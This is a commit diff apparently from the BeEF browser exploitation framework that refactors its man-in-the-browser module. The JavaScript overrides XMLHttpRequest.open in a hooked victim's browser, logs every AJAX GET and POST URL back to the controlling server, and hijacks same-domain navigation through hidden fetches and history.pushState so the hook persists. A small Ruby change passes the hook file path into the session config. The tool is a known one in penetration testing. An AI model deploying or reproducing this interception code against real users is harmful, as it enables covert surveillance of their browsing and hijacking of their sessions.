Refactored mitm.js AJAX sniffing feature. Fixed a couple of other bugs in mitb.js

2012-12-30 13:13:10 +01:00
parent 0244980db0
commit d976e86cbe
2 changed files with 25 additions and 45 deletions
--- a/core/main/client/mitb.js
+++ b/core/main/client/mitb.js
@@ -15,46 +15,30 @@ beef.mitb = {
        beef.mitb.curl = curl;
        /*Override open method to intercept ajax request*/
        var xml_type;
+        var hook_file = "<%= @hook_file %>";

        if (window.XMLHttpRequest && !(window.ActiveXObject)) {

-            xml_type = 'XMLHttpRequest';
-        }
-
-        if (xml_type == "XMLHttpRequest") {
            beef.mitb.sniff("Method XMLHttpRequest.open override");
            (function (open) {
-                XMLHttpRequest.prototype.open = function (method, url, async, user, pass) {
-
+                XMLHttpRequest.prototype.open = function (method, url, async, mitb_call) {
+                    // Ignore it and don't hijack it. It's either a request to BeEF (hook file or Dynamic Handler)
+                    // or a request initiated by the MiTB itself.
+                    if (mitb_call || (url.indexOf(hook_file) != -1 || url.indexOf("/dh?") != -1)) {
+                        open.call(this, method, url, async, true);
+                    }else {
                        var portRegex = new RegExp(":[0-9]+");
                        var portR = portRegex.exec(url);
-                    /*return :port*/
                        var requestPort;
+                        if (portR != null) { requestPort = portR[0].split(":")[1]; }

-                    if (portR != null) {
-                        requestPort = portR[0].split(":");
-                    }
-
-                    if ((user == "beef") && (pass == "beef")) {
-                        /*a poisoned something*/
-                        open.call(this, method, url, async, null, null);
-                    }
-
-
-                    else if (url.indexOf("hook.js") != -1 || url.indexOf("/dh?") != -1) {
-                        /*a beef hook.js polling or dh */
-                        open.call(this, method, url, async, null, null);
-                    }
-
-                    else {
-
+                        //GET request
                        if (method == "GET") {
+                            //GET request -> cross-domain
                            if (url.indexOf(document.location.hostname) == -1 || (portR != null && requestPort != document.location.port )) {
                                beef.mitb.sniff("GET [Ajax CrossDomain Request]: " + url);
                                window.open(url);
-
-                            }
-                            else {
+                            }else { //GET request -> same-domain
                                beef.mitb.sniff("GET [Ajax Request]: " + url);
                                if (beef.mitb.fetch(url, document.getElementsByTagName("html")[0])) {
                                    var title = "";
@@ -63,26 +47,19 @@ beef.mitb = {
                                    } else {
                                        title = document.getElementsByTagName("title")[0].innerHTML;
                                    }
-                                    /*write the url of the page*/
+                                    // write the url of the page
                                    history.pushState({ Be:"EF" }, title, url);
-
                                }
-
                            }
-
-                        }
-                        else {
-                            /*if we are here we have an ajax post req*/
-                            beef.mitb.sniff("Post ajax request to: " + url);
-                            open.call(this, method, url, async, user, pass);
-
+                        }else{
+                            //POST request
+                            beef.mitb.sniff("POST ajax request to: " + url);
+                            open.call(this, method, url, async, true);
                        }
                    }
                };
            })(XMLHttpRequest.prototype.open);
-
        }
-
    },

    // Initializes the hook on anchors and forms.
@@ -161,7 +138,7 @@ beef.mitb = {
    fetchForm:function (url, query, target) {
        try {
            var y = new XMLHttpRequest();
-            y.open('POST', url, false, "beef", "beef");
+            y.open('POST', url, false, true);
            y.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
            y.onreadystatechange = function () {
                if (y.readyState == 4 && y.responseText != "") {
@@ -181,7 +158,7 @@ beef.mitb = {
    fetch:function (url, target) {
        try {
            var y = new XMLHttpRequest();
-            y.open('GET', url, false, "beef", "beef");
+            y.open('GET', url, false, true);
            y.onreadystatechange = function () {
                if (y.readyState == 4 && y.responseText != "") {

@@ -204,7 +181,7 @@ beef.mitb = {
        try {
            var target = document.getElementsByTagName("html")[0];
            var y = new XMLHttpRequest();
-            y.open('GET', url, false, "beef", "beef");
+            y.open('GET', url, false, true);
            y.onreadystatechange = function () {
                if (y.readyState == 4 && y.responseText != "") {
                    var title = "";
--- a/core/main/handlers/modules/beefjs.rb
+++ b/core/main/handlers/modules/beefjs.rb
@@ -74,6 +74,9 @@ module BeEF
            # @note set the XHR-polling timeout
            hook_session_config['xhr_poll_timeout'] = config.get("beef.http.xhr_poll_timeout")

+            # @note set the hook file path
+            hook_session_config['hook_file'] = config.get("beef.http.hook_file")
+
            # @note if http_port <> public_port in config ini, use the public_port
            unless hook_session_config['beef_public_port'].nil?
              if hook_session_config['beef_port'] != hook_session_config['beef_public_port']